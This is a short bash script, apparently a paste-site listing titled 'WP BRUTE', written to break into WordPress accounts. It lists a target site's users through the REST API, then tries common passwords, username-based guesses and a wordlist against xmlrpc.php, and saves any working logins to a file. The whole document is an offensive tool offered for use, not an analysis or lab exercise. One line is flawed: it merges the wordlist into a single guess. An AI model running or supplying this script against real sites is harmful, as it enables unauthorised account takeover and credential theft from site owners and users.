WP BRUTE

1. #!/bin/bash
2. # WORDPRESS XMLRPC BRUTEFORCE
3. # save password list with name > wordlist.txt
4.  
5. function _brute() {
6.     TARGET="${1}";
7.     JSONUSER=$(curl -s "${TARGET}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
8.     if [[ ! -z ${JSONUSER} ]];then
9.         echo "INFO: ${TARGET} username found!"
10.         for USER in ${JSONUSER};
11.         do
12.             PASS=( '123456' '12345678' 'admin' 'qwerty' 'qwerty123' ''"${USER}"'' ''"${USER}123"'' ''"$(cat wordlist.txt | tr '\r\n' ' ')"'' );
13.             for PWD in "${PASS[@]}";
14.             do
15.                 BRUTE=$(timeout 3 curl -s -X POST -d '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>'$USER'</value></param><param><value>'$PWD'</value></param></params></methodCall>' ${TARGET}/xmlrpc.php);
16.                 if [[ ${BRUTE} =~ "blogName" ]];then
17.                     echo "  FOUND!: ${TARGET} ${USER}:${PWD} saved to WORDPRESS-LOGIN.TXT";
18.                     echo "${TARGET} ${USER}:${PWD}" >> WORDPRESS-LOGIN.TXT
19.                     return 0;
20.                 else
21.                     echo "  FAILED: ${TARGET} ${USER}:${PWD}";
22.                 fi
23.             done
24.         done
25.     else
26.         echo "ERROR: ${TARGET} can grab username";
27.     fi
28. }
29.  
30. _brute ${1}